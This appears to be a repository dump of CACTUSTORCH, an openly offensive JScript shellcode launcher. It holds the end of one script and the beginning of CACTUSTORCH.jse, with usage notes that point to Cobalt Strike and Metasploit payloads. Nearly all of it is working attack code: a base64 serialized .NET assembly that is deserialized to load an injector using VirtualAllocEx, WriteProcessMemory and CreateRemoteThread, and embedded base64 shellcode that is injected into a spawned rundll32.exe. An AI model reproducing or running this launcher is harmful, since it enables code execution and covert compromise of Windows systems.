58 | "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
59 | "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
60 | "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
61 | "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
62 | "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
63 | "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
64 | "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
65 | "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
66 | "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
67 | "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
68 | "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
69 | "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
70 | "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
71 | "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
72 | "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
73 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
74 | "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAkNhXWQAAAAAA"+
75 | "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAAByNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
76 | "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAIDUA"+
77 | "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
78 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
79 | "AAAALnRleHQAAAB4FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA"+
80 | "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA"+
81 | "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFQ1AAAAAAAASAAAAAIABQD4IQAAKBMAAAEAAAAAAAAA"+
82 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT"+
83 | "MAoABwEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMJAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA"+
84 | "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME"+
85 | "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAosbhEFFnMRAAAK"+
86 | "ByAAMAAAH0AoAgAABhMGEgYoFgAACnJXAABwKBgAAAosChEFFigEAAAGJioWEwcSCAaOaSgRAAAK"+
87 | "EQURBgYRCBEHKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMRAAAKKAUAAAYmKnoCfhUAAAp9AgAA"+
88 | "BAIoDwAACgICKBkAAAp9AQAABCoAABMwAgBgAAAAAAAAAAJ+FQAACn0rAAAEAn4VAAAKfSwAAAQC"+
89 | "fhUAAAp9LQAABAJ+FQAACn04AAAEAn4VAAAKfTkAAAQCfhUAAAp9OgAABAJ+FQAACn07AAAEAigP"+
90 | "AAAKAgIoGQAACn0qAAAEKkJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAACgHAAAj"+
91 | "fgAAlAcAAEwJAAAjU3RyaW5ncwAAAADgEAAAXAAAACNVUwA8EQAAEAAAACNHVUlEAAAATBEAANwB"+
92 | "AAAjQmxvYgAAAAAAAAACAAABVx0CFAkCAAAA+gEzABYAAAEAAAAXAAAACQAAAFAAAAAJAAAAHwAA"+
93 | "ABkAAAAzAAAAEgAAAAEAAAABAAAABQAAAAEAAAABAAAABwAAAAAAmQYBAAAAAAAGAFwFkgcGAMkF"+
94 | "kgcGAIoEYAcPALIHAAAGALIE4QYGADAF4QYGABEF4QYGALAF4QYGAHwF4QYGAJUF4QYGAMkE4QYG"+
95 | "AJ4EcwcGAHwEcwcGAPQE4QYGAKsIqQYGAGEEqQYGAE0FqQYGALAGqQYGAMoIqQYGAFkHqQYGAL4I"+
96 | "qQYGAGYGqQYGAIQGcwcAAAAAJQAAAAAAAQABAAEAEABtBgAAPQABAAEACgAQAPgHAAA9AAEACAAK"+
97 | "ARAAzgYAAEEABAAJAAIBAAAbCAAASQAIAAkAAgEAADYIAABJACcACQAKABAABgcAAD0AKgAJAAIB"+
98 | "AABtBAAASQA8AAoAAgEAAPMGAABJAEUACgAGAH0G+gAGAEQHPwAGACQE/QAGAHQIPwAGAOcDPwAG"+
99 | "AMgD+gAGAL0D+gAGBp4DAAFWgLICAwFWgMACAwFWgGQAAwFWgIgCAwFWgMIAAwFWgFMCAwFWgPEB"+
100 | "AwFWgB0CAwFWgAUCAwFWgKABAwFWgAIDAwFWgF4BAwFWgEgBAwFWgOEBAwFWgE0CAwFWgDECAwFW"+
101 | "gGoDAwFWgIIDAwFWgJkCAwFWgB0DAwFWgHYBAwFWgHUAAwFWgD0AAwFWgCcBAwFWgKgAAwFWgDoD"+
102 | "AwFWgLkBAwFWgBgBAwFWgMYBAwFWgOUCAwEGBp4DAAFWgJEABwFWgHICBwEGAKYD+gAGAO8DPwAG"+
103 | "ABcHPwAGADMEPwAGAEsD+gAGAJoD+gAGAOcF+gAGAO8F+gAGAEcI+gAGAFUI+gAGAOQE+gAGAC4I"+
104 | "+gAGAOcICwEGAA0ACwEGABkAPwAGANIIPwAGANwIPwAGADQHPwAGBp4DAAFWgN4CDgFWgO8ADgFW"+
105 | "gJ0BDgFWgNgCDgFWgNUBDgFWgA8BDgFWgJQBDgFWgAMBDgEGBp4DAAFWgOcAEgFWgFcAEgFWgNUA"+
106 | "EgFWgFgDEgFWgGkCEgFWgE8DEgFWgN0AEgFWgGADEgFWgBEGEgFWgCQGEgFWgDkGEgEAAAAAgACW"+
107 | "IC4AFgEBAAAAAACAAJYg8wgqAQsAAAAAAIAAliAJCTUBEAAAAAAAgACWIGMIPwEVAAAAAACAAJEg"+
108 | "1ANFARcAUCAAAAAAhhg+BwYAHgBYIAAAAACGAE0EUAEeAGshAAAAAIYYPgcGACAAjCEAAAAAhhg+"+
109 | "BwYAIAAAAAEAOwQAAAIAUwQAAAMA5AcAAAQA0QcAAAUAwQcAAAYACwgAAAcAvAgAAAgAHAkBAAkA"+
110 | "BAcCAAoAzAYAAAEAGwQAAAIAiwgAAAMAAwYAAAQAawQAAAUAsggAAAEAdAgAAAIAfQgAAAMAIQcA"+
111 | "AAQAAwYAAAUAtQYAAAEAdAgAAAIA+gMAAAEAdAgAAAIA0QcAAAMA9wUAAAQAlQgAAAUAKAcAAAYA"+
112 | "CwgAAAcAsgMAAAEAAgkAAAIAAQAJAD4HAQARAD4HBgAZAD4HCgApAD4HEAAxAD4HEAA5AD4HEABB"+
113 | "AD4HEABJAD4HEABRAD4HEABZAD4HEABhAD4HFQBpAD4HEABxAD4HEACJAD4HBgB5AD4HBgCZAFMG"+
114 | "KQChAD4HAQCpAAQELwCxAHkGNACxAKQIOAChABIHPwChAGQGQgCxADsJRgCxAC8JRgC5AAoGTAAJ"+
115 | "ACQAWgAJACgAXwAJACwAZAAJADAAaQAJADQAbgAJADgAcwAJADwAeAAJAEAAfQAJAEQAggAJAEgA"+
116 | "hwAJAEwAjAAJAFAAkQAJAFQAlgAJAFgAmwAJAFwAoAAJAGAApQAJAGQAqgAJAGgArwAJAGwAtAAJ"+
117 | "AHAAuQAJAHQAvgAJAHgAwwAJAHwAyAAJAIAAzQAJAIQA0gAJAIgA1wAJAIwA3AAJAJAA4QAJAJQA"+
118 | "5gAJAJgA6wAJAKAAWgAJAKQAXwAJAPQAlgAJAPgAmwAJAPwA8AAJAAABuQAJAAQB4QAJAAgB9QAJ"+
119 | "AAwBvgAJABABwwAJABgBbgAJABwBcwAJACABeAAJACQBfQAJACgBWgAJACwBXwAJADABZAAJADQB"+
120 | "aQAJADgBggAJADwBhwAJAEABjAAuAAsAVgEuABMAXwEuABsAfgEuACMAhwEuACsAhwEuADMAmAEu"+
121 | "ADsAmAEuAEMAhwEuAEsAhwEuAFMAmAEuAFsAngEuAGMApAEuAGsAzgFDAFsAngGjAHMAWgDDAHMA"+
122 | "WgADAXMAWgAjAXMAWgAaAIwGAAEDAC4AAQAAAQUA8wgBAAABBwAJCQEAAAEJAGMIAQAAAQsA1AMB"+
123 | "AASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAAAAMAAgAEAAIABQACAAYA"+
124 | "AgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQyAGxwUmVzZXJ2ZWQyADxN"+
125 | "b2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJPTV9KT0IARVhFQ1VURV9S"+
126 | "RUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9VTkRfRU5EAERVUExJQ0FU"+
127 | "RV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBDUkVBVEVfTkVXX0NPTlNP"+
128 | "TEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RVU1RPUkNIAFdSSVRFX1dB"+
129 | "VENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xF"+
130 | "VkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNT"+
131 | "X01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVfTkVXX1BST0NFU1NfR1JP"+
132 | "VVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VTAENSRUFURV9GT1JDRURP"+
133 | "UwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NMQVNTAEhJR0hfUFJJT1JJ"+
134 | "VFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9XX05PUk1BTF9QUklPUklU"+
135 | "WV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVUQUNIRURfUFJPQ0VTUwBD"+
136 | "UkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJP"+
137 | "Q0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVGQVVMVABDUkVBVEVfVU5J"+
138 | "Q09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVTRU5UAENSRUFURV9OT19X"+
139 | "SU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVSSVRfUEFSRU5UX0FGRklO"+
140 | "SVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNiAG1zY29ybGliAGxwVGhy"+
141 | "ZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJlYWQAaFRocmVhZABs"+
142 | "cFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxlAGxwSGFuZGxlAGJJbmhl"+
143 | "cml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUAbHBDb21tYW5kTGluZQBW"+
144 | "YWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1"+
145 | "dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJh"+
146 | "ZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmli"+
147 | "dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0"+
148 | "cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNz"+
149 | "ZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5"+
150 | "Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1hTaXplAGR3"+
151 | "WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNI"+
152 | "RV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBGcm9tQmFzZTY0U3RyaW5n"+
153 | "AFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABrZXJuZWwzMi5kbGwAQ0FD"+
154 | "VFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AbHBQcm9jZXNz"+
155 | "SW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJ"+
156 | "bmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3RkRXJyb3IALmN0b3IAbHBT"+
157 | "ZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGlt"+
158 | "ZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dp"+
159 | "bmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJp"+
160 | "YnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxh"+
161 | "Z3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMAZHdZQ291bnRDaGFycwBU"+
162 | "ZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRB"+
163 | "ZGRyZXNzAENvbmNhdABPYmplY3QAZmxQcm90ZWN0AGxwRW52aXJvbm1lbnQAQ29udmVydABoU3Rk"+
164 | "SW5wdXQAaFN0ZE91dHB1dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABiaW5hcnkAV3JpdGVQ"+
165 | "cm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVjdG9yeQBvcF9FcXVhbGl0eQBvcF9JbmVxdWFsaXR5"+
166 | "AAAAAAABABlQAHIAbwBnAHIAYQBtAFcANgA0ADMAMgAADXcAaQBuAGQAaQByAAAVXABTAHkAcwBX"+
167 | "AE8AVwA2ADQAXAAAFVwAUwB5AHMAdABlAG0AMwAyAFwAAAMwAAAARY+bzuLqxE+aSSAzLsphXgAE"+
168 | "IAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgcJHQUYEhwREA4YGAgYBQABHQUOBAABDg4DIAAIBgAD"+
169 | "Dg4ODgIGGAMgAA4FAAICDg4EAAEIHAi3elxWGTTgiQQBAAAABAIAAAAEBAAAAAQIAAAABBAAAAAE"+
170 | "IAAAAARAAAAABIAAAAAEAAEAAAQAAgAABAAEAAAEAAgAAAQAEAAABAAgAAAEAEAAAAQAgAAABAAA"+
171 | "AQAEAAACAAQAAAQABAAACAAEAAAQAAQAACAABAAAAAEEAAAAAgQAAAAEBAAAAAgEAAAAEAQAAAAg"+
172 | "BAAAAEAEAAAAgAQAMAAABAAAQAACBggCBgICBgkDBhEUAwYRGAIGBgMGESADBhEkEwAKGA4OEgwS"+
173 | "DAIRFBgOEhwQERAKAAUYGBgYESARJAkABQIYGB0FGAgFAAICGAkKAAcYGBgJGBgJGAUgAgEODggB"+
174 | "AAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAQAQALQ0FDVFVT"+
175 | "VE9SQ0gAAAUBAAAAAAUBAAEAACkBACQ1NjU5OGYxYy02ZDg4LTQ5OTQtYTM5Mi1hZjMzN2FiZTU3"+
176 | "NzcAAAwBAAcxLjAuMC4wAAAASDUAAAAAAAAAAAAAYjUAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
177 | "AFQ1AAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAA"+
178 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
179 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
180 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA"+
181 | "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A"+
182 | "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA"+
183 | "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA"+
184 | "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs"+
185 | "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA"+
186 | "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA"+
187 | "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA"+
188 | "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu"+
189 | "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA"+
190 | "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV"+
191 | "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"+
192 | "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP"+
193 | "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA"+
194 | "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw"+
195 | "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA"+
196 | "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
197 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
198 | "AAAAAAAAAAAAAAAAADAAAAwAAAB0NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
199 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
200 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
201 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
202 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
203 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
204 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
205 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
206 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
207 | "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv"+
208 | "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
209 | var entry_class = 'cactusTorch';
210 |
211 | try {
212 | setversion();
213 | var stm = base64ToStream(serialized_obj);
214 | var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
215 | var al = new ActiveXObject('System.Collections.ArrayList');
216 | var n = fmt.SurrogateSelector;
217 | var d = fmt.Deserialize_2(stm);
218 | al.Add(n);
219 | var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
220 | o.flame(binary,code);
221 | } catch (e) {
222 | debug(e.message);
223 | }
224 |
--------------------------------------------------------------------------------
/CACTUSTORCH.jse:
--------------------------------------------------------------------------------
1 | /*
2 | ( ) ( )
3 | ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /(
4 | )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\())
5 | (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\
6 | )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_)
7 | ((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || |
8 | | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ |
9 | \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_|
10 |
11 | Author: Vincent Yiu (@vysecurity)
12 | Credits:
13 | - @cn33liz: Inspiration with StarFighter
14 | - @tiraniddo: James Forshaw for DotNet2JScript
15 | - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into
16 |
17 | A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.
18 |
19 | Usage:
20 | Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example...
21 | Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework
22 | Run: cat payload.bin | base64 -w 0
23 | Copy the base64 encoded payload into the code variable below.
24 |
25 | */
26 |
27 | // Replace binary with a executable in both SYSTEM32 and SYSWOW64 that you want to use as container. eg. notepad.exe, calc.exe
28 | var binary = "rundll32.exe";
29 |
30 | // Replace code with base64 encoded 32 bit shellcode
31 | var code = "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqzckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAAAAIAAAUAAAAAAAAABQAAAAA";
32 |
33 |
34 | // ------------ DO NOT EDIT BELOW HERE --------------
35 |
36 | function setversion() {
37 | }
38 | function debug(s) {}
39 | function base64ToStream(b) {
40 | var enc = new ActiveXObject("System.Text.ASCIIEncoding");
41 | var length = enc.GetByteCount_2(b);
42 | var ba = enc.GetBytes_4(b);
43 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
44 | ba = transform.TransformFinalBlock(ba, 0, length);
45 | var ms = new ActiveXObject("System.IO.MemoryStream");
46 | ms.Write(ba, 0, (length / 4) * 3);
47 | ms.Position = 0;
48 | return ms;
49 | }
50 |
51 | var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
52 | "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
53 | "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
54 | "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
55 | "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
56 | "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
57 | "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
58 | "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
59 | "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
60 | "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
61 | "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
62 | "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
